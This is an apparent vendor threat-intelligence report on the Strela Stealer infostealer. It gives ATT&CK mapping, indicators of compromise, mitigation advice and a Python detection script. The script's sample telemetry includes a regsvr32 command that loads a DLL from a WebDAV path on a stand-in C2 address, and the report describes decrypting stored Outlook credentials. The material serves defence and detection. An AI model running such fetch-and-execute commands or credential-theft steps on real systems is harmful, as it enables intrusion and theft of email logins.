# Full Report
Infostealers have come to dominate the malware landscape because their operations are cheap to maintain and the pool of potential victims is wide. In this blog, we take a closer look at a distinctive infostealer designed to target a narrow data set on systems located in chosen geographic locations.
# Analysis Summary
# Tool/Technique: Strela Stealer
## Overview
Strela Stealer (Cтрела, 'Arrow') is a highly focused infostealer malware variant designed to precisely target and exfiltrate email login credentials from Mozilla Thunderbird and Microsoft Outlook installations. It is known for leveraging sophisticated social engineering tactics, particularly phishing campaigns centered around fake invoices, and employing multi-layer obfuscation to complicate analysis.
## Technical Details
- Type: Malware family (Infostealer)
- Platform: Windows
- Capabilities: Email credential theft (Outlook/Thunderbird), system information gathering, geographic targeting, multi-stage execution via loaders.
- First Seen: Late 2022
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment
- **TA0002 - Execution**
  - T1059 - Command and Scripting Interpreter
    - T1059.003 - Windows Command Shell (via `wscript.exe`)
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1055 - Process Injection (Implied via `regsvr32` execution technique)
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Geographic Restriction:** Executes only on systems whose Language Code Identifier (LCID) matches specific German-speaking countries (Germany, Austria, Liechtenstein, Luxembourg, Switzerland).
- **Email Credential Theft:** Targets and decrypts IMAP user credentials (username, server, password) from Microsoft Outlook profile registry keys using `CryptUnprotectData`.
- **System Information Gathering:** Executes `systeminfo` and retrieves a list of installed applications using `SHGetKnownFolderItem`.
### Advanced Features
- **Multi-Stage Delivery:** Utilizes a JScript file executed via Windows Script Host (WScript) as the initial loader, which fetches a second-stage DLL payload from a C2 server using WebDAV.
- **Defense Evasion:** Employs custom multi-layer obfuscation and code-flow flattening in the DLL payload to hinder dynamic and static analysis.
- **Loader Sophistication:** Possible use of a specialized crypter known as ‘Stellar loader’.
- **In-Memory Execution:** The second-stage DLL payload is executed directly via `regsvr32` without being saved to disk (living off the land execution).
- **Decoy Document:** Downloads and displays a blurred PDF decoy after execution to mask the malicious activity.
- **C2 Communication:** Exfiltrates data by sending HTTP requests containing a host-unique identifier (Volume GUID of the system folder), pausing between read attempts using `Sleep()`.
## Indicators of Compromise
- File Hashes:
  - SHA256: `f5c54fce6c9e2f84b084bbf9968c9a76d9cd74a11ccf4fcba29dbe2e4574e3d7` (JScript/Loader)
  - SHA256: `9c49266e315eb76ce73cbe542cfd2bbf28844689944ac8776daecbdcdecd8cf8` (DLL Payload)
  - SHA256: `31389cb2f067020f181462bab3519c22fd88da084012729e9edf79d15427b86f` (Additional sample hash)
- File Names:
  - `1692630503222433608.js`
  - `1909835116765.dll`
- Registry Keys (Searched for Outlook profiles):
  - `HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676`
  - `HKCU\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676`
  - `HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676`
- Network Indicators:
  - C2 IP: `193.143[.]1[.]205`
  - URLs: `hxxp://193.143[.]1[.]205/invoice.php`, `hxxp://193.143[.]1[.]205/up.php`
- Behavioral Indicators:
  - Execution of JScript via `wscript.exe`.
  - Use of `regsvr32` to execute a DLL via its `DllRegisterServer` export.
  - Querying system locale via LCIDs.
## Associated Threat Actors
- Hive0145 (Believed to be operated by a single threat actor)
## Detection Methods
- Signature-based detection: Hash matching for known samples.
- Behavioral detection: Monitoring for the execution chain starting with JScript launching via WSH, followed by `regsvr32` loading a recent file from a WebDAV source, especially when combined with attempts to read Outlook registry keys.
- YARA rules: Custom rules targeting the obfuscation techniques or specific decryption routine logic.
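The behavioral chain above (WSH launching a JScript file, `regsvr32` pulling a DLL from a WebDAV path, and that process reading the Outlook profile key) can be correlated in a few lines. The script below is an added example written for this summary, not code from the original report or from any vendor; the event shape (`process_create` / `registry_read` dictionaries) is a constructed, EDR-agnostic stand-in that you would map your own telemetry onto, and the sample events are constructed, with `203.0.113.10` (a documentation address) standing in for the C2 host. The file names and the Outlook profile GUID are the ones listed in the IoC section.

```python
"""Correlate process and registry telemetry into a Strela-style execution chain.

Added example, not part of the original report. The event schema below is a
constructed stand-in (pid/ppid/image/cmdline for process creation, pid/key for
registry reads); adapt the field names to your own EDR or Sysmon pipeline.
"""
import re
from collections import defaultdict

# Outlook profile GUID shared by all three registry paths in the IoC section.
OUTLOOK_PROFILE_GUID = "9375CFF0413111d3B88A00104B2A6676"

# DLL sourced remotely: WebDAV UNC (\\host@80\..., \\host@SSL\...), a DavWWWRoot
# path, or a bare URL on the regsvr32 command line.
REMOTE_DLL_SOURCE = re.compile(
    r"(\\\\[^\\\s]+@(?:80|443|SSL)\\|DavWWWRoot|https?://)", re.IGNORECASE)
JSCRIPT_ARG = re.compile(r"\.js\b", re.IGNORECASE)


def is_wsh(image: str) -> bool:
    """True for the Windows Script Host binaries."""
    return image.lower().endswith(("\\wscript.exe", "\\cscript.exe"))


def is_regsvr32(image: str) -> bool:
    return image.lower().endswith("\\regsvr32.exe")


def detect_strela_chain(events):
    """Return one finding per regsvr32 process showing at least two of the
    behaviours the report describes: spawned by WSH, that WSH instance ran a
    .js file, DLL loaded from a WebDAV/remote path, Outlook profile key read.
    A lone regsvr32 registering a local DLL never reaches the threshold."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    reg_reads = defaultdict(list)
    for e in events:
        if e["type"] == "registry_read":
            reg_reads[e["pid"]].append(e["key"])

    findings = []
    for pid, e in procs.items():
        if not is_regsvr32(e["image"]):
            continue
        reasons = []
        parent = procs.get(e["ppid"])
        if parent and is_wsh(parent["image"]):
            reasons.append("regsvr32 spawned by Windows Script Host")
            if JSCRIPT_ARG.search(parent["cmdline"]):
                reasons.append("WSH parent launched a JScript file")
        if REMOTE_DLL_SOURCE.search(e["cmdline"]):
            reasons.append("regsvr32 loading a DLL from a WebDAV/remote path")
        if any(OUTLOOK_PROFILE_GUID.lower() in k.lower() for k in reg_reads[pid]):
            reasons.append("process read an Outlook profile registry key")
        if len(reasons) >= 2:
            findings.append({
                "pid": pid,
                "ppid": e["ppid"],
                "severity": "high" if len(reasons) >= 3 else "medium",
                "reasons": reasons,
            })
    return findings


# Constructed sample telemetry (not real logs). 203.0.113.10 is a documentation
# address standing in for the C2 host; file names come from the IoC section.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4100, "ppid": 3000,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 5200, "ppid": 4100,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\1692630503222433608.js"'},
    {"type": "process_create", "pid": 5310, "ppid": 5200,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s \\203.0.113.10@80\DavWWWRoot\1909835116765.dll"},
    {"type": "registry_read", "pid": 5310,
     "key": r"HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    # Benign: an administrator registering a COM DLL that ships in System32.
    {"type": "process_create", "pid": 6000, "ppid": 4100,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 C:\Windows\System32\msxml6.dll"},
]

if __name__ == "__main__":
    for f in detect_strela_chain(SAMPLE_EVENTS):
        print(f"[{f['severity']}] regsvr32 pid={f['pid']} ppid={f['ppid']}")
        for r in f["reasons"]:
            print("   -", r)
```

The two-signal threshold is the design choice worth keeping: `regsvr32` run by an administrator against a local DLL produces no signal, while the reported chain lights up all four and is scored high. Registry reads are not recorded by every sensor (Sysmon, for instance, logs key creation and value writes rather than reads), so on such a pipeline the chain still fires on the three process-based signals alone.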
## Mitigation Strategies
- **Email Security:** Implement robust email filtering, specifically sandboxing attachments or blocking execution of JScript/VBScript files delivered via common archive formats (like ZIP).
- **Application Control:** Implement strict controls over execution of system utilities like `regsvr32` loading arbitrary DLLs from non-standard locations.
- **Network Monitoring:** Block or alert on traffic to known C2 infrastructure, especially bulletproof hosting providers like Proton66 OOO (AS 198953).
- **User Awareness:** Continual training highlighting invoice-themed social engineering attacks.
## Related Tools/Techniques
- Stellar loader (Potential specialized crypter used with Strela Stealer).
- Use of `regsvr32` for in-memory DLL execution (similar to DotNetToJScript or other LOLBin abuse).